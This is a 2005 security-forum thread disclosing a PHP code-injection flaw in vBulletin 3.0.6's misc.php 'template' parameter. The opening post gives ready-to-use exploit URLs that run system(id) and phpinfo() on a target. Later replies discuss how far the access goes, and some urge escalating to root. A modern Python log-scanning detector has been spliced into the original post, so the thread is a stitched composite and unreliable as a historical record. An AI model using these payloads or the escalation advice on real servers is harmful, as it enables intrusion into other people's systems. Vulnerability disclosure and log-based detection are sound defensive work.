IT Security and Insecurity Portal |
|
 |
vBulletin 3.0.6 and prior versions Exec commands in server |
 |
Posted: Wed Feb 23, 2005 2:39 pm |
|
|
LINUX |
Moderator |

 |
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
 |
 |
 |
|
vBulletin Version(s): 3.0.6 and prior versions
in the processing of template names. A remote user can execute PHP commands in certain cases.
If the 'Add Template Name in HTML Comments' option is enabled (which is not the default configuration and is not recommended by the vendor for use in a production environment), a remote user can submit PHP code in the 'template' parameter in 'misc.php'
Real Life code exploit
Code: | http://[target]//forum/misc.php?do=page&template={${system(id)}} |
Code: | http://[target]//forum/misc.php?do=page&template={${phpinfo()}} |
www.sosvulnerable.net - svsecurity@gmail.com |
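The request pattern described in this post (PHP curly-brace syntax in the 'template' parameter of 'misc.php') can be searched for in web server access logs. The following is an added example, not part of the original post and not vBulletin code; the combined log format, the allow-list of template-name characters, the function names and the sample log lines are all assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumption: legitimate template names contain only these characters.
SAFE_TEMPLATE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, made-up sizes and names).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Feb/2005:14:41:02 +0000] "GET /forum/misc.php?do=page&template=faq_rules HTTP/1.1" 200 5120',
    '192.0.2.77 - - [23/Feb/2005:14:42:10 +0000] "GET /forum/misc.php?do=page&template=%7B%24%7Bphpinfo()%7D%7D HTTP/1.1" 200 40112',
    '192.0.2.77 - - [23/Feb/2005:14:42:31 +0000] "GET /forum/misc.php?do=page&template=%257B%2524%257Bphpinfo()%257D%257D HTTP/1.1" 200 812',
    '192.0.2.10 - - [23/Feb/2005:14:43:00 +0000] "GET /forum/showthread.php?t=12 HTTP/1.1" 200 9000',
]

def fully_unquote(value, rounds=3):
    """Strip up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_template(log_line):
    """Return the decoded 'template' value if it should be flagged, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    if not fully_unquote(path).lower().endswith("misc.php"):
        return None
    for raw in parse_qs(query, keep_blank_values=True).get("template", []):
        value = fully_unquote(raw)  # parse_qs already decoded one layer
        if not SAFE_TEMPLATE.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_template(line)
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious template value {value!r}")
```

A hit only shows that the request was made; whether it had any effect depends on the 'Add Template Name in HTML Comments' option being enabled, as the post states.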
|
|
|
|
Posted: Wed Feb 23, 2005 4:40 pm |
|
|
Alkaen |
Regular user |

 |
|
Joined: Feb 16, 2005 |
Posts: 5 |
Location: Bahrain - Aldair |
|
|
 |
 |
 |
|
Thanks dude
& wait a lot of exploit in vBulletin Version 3.0.6
Alkaen.. |
|
|
|
|
Posted: Wed Feb 23, 2005 9:47 pm |
|
|
SteX |
Advanced user |

 |
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
 |
 |
 |
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
Posted: Thu Feb 24, 2005 10:43 am |
|
|
Zeelock |
Active user |

 |
|
Joined: Jan 27, 2005 |
Posts: 29 |
Location: Where stars come out at night |
|
|
 |
 |
 |
|
|
_________________ If it seems to be impossible, just step up your level! |
|
|
|
Posted: Thu Feb 24, 2005 4:07 pm |
|
|
HaCkZataN |
Regular user |

 |
|
Joined: Feb 23, 2005 |
Posts: 11 |
|
|
|
 |
 |
 |
|
if the server has SAFE MODE ON mmm I don't think that will be useful |
|
|
|
|
Posted: Thu Mar 24, 2005 4:22 pm |
|
|
octane |
Beginner |

 |
|
Joined: Mar 24, 2005 |
Posts: 2 |
|
|
|
 |
 |
 |
|
can't you like execute a small shell on the server? if it's running windows for example? |
|
|
|
|
Posted: Fri Mar 25, 2005 12:56 pm |
|
|
Injector |
Active user |

 |
|
Joined: Dec 29, 2004 |
Posts: 49 |
|
|
|
 |
 |
 |
|
octane wrote: | can't you like execute a small shell on the server? if it's running windows for example? |
You can't execute simple commands like ls, pwd etc. but that's pretty much it
especially that vbulletin is secure you won't really go far with that exploit |
|
|
|
|
Posted: Fri Mar 25, 2005 1:22 pm |
|
|
y3dips |
Valuable expert |

 |
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
 |
 |
 |
|
Zeelock wrote: |
Made by Pokleyzz |
pokyleyzz WAS HERE !!!
heuheueue |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Fri Mar 25, 2005 2:07 pm |
|
|
y3dips |
Valuable expert |

 |
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
 |
 |
 |
|
HaCkZataN wrote: | if the server has SAFE MODE ON mmm I don't think that will be useful |
for further information we could look at the PHP manual (good if u have compiled html (.chm)) then u could see what functions are restricted by safe_mode
 |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Sat Mar 26, 2005 3:20 pm |
|
|
octane |
Beginner |

 |
|
Joined: Mar 24, 2005 |
Posts: 2 |
|
|
|
 |
 |
 |
|
Injector wrote: | octane wrote: | can't you like execute a small shell on the server? if it's running windows for example? |
You can't execute simple commands like ls, pwd etc. but that's pretty much it
especially that vbulletin is secure you won't really go far with that exploit |
so what good does this exploit do if you can't get root |
|
|
|
|
Posted: Sat Mar 26, 2005 3:34 pm |
|
|
y3dips |
Valuable expert |

 |
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
 |
 |
 |
|
octane wrote: | Injector wrote: | octane wrote: | can't you like execute a small shell on the server? if it's running windows for example? |
You can't execute simple commands like ls, pwd etc. but that's pretty much it
especially that vbulletin is secure you won't really go far with that exploit |
so what good does this exploit do if you can't get root |
at least you're inside the machine
after that USE your brain :LOL: |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
 |
 |
|
 |
Posted: Tue Mar 29, 2005 8:53 pm |
|
|
waraxe |
Site admin |

 |
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
 |
 |
 |
|
octane wrote: | Injector wrote: | octane wrote: | can't you like execute a small shell on the server? if it's running windows for example? |
You can't execute simple commands like ls, pwd etc. but that's pretty much it
especially that vbulletin is secure you won't really go far with that exploit |
so what good does this exploit do if you can't get root |
Then you need a good local root exploit |
|
|
|
|
Posted: Mon Jul 18, 2005 10:38 am |
|
|
logan |
Beginner |

 |
|
Joined: Jul 10, 2005 |
Posts: 2 |
|
|
|
 |
 |
 |
|
|
|
|
|